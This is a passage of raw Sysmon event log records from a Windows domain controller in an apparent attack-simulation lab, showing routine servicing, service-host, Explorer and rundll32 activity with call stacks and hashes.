10341000x800000000000000011268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.602{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.602{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.602{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.602{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.586{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.586{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.570{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.570{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.570{59A5CD1D-93FA-6005-FC04-00000000A301}37843160C:\Windows\Explorer.EXE{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+551ba4|C:\Windows\System32\SHELL32.dll+551600|C:\Windows\System32\SHELL32.dll+551774|C:\Windows\System32\SHELL32.dll+203065|C:\Windows\System32\SHELL32.dll+8128d|C:\Windows\System32\SHELL32.dll+45f51 154100x800000000000000011256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.572{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iesetup.dll",IEHardenAdminC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 11241100x800000000000000011255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.492{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEC:\Users\Administrator\Links\Downloads.lnk2021-01-18 12:24:23.866 11241100x800000000000000011254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.492{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEC:\Users\Administrator\Links\Desktop.lnk2021-01-18 12:24:23.866 11241100x800000000000000011309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.758{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer (7).lnk2021-01-18 13:58:29.758 11241100x800000000000000011308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.680{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer (7).lnk2021-01-18 13:58:29.680 13241300x800000000000000011307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:58:29.648{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefileBinary Data 10341000x800000000000000011306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:29.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 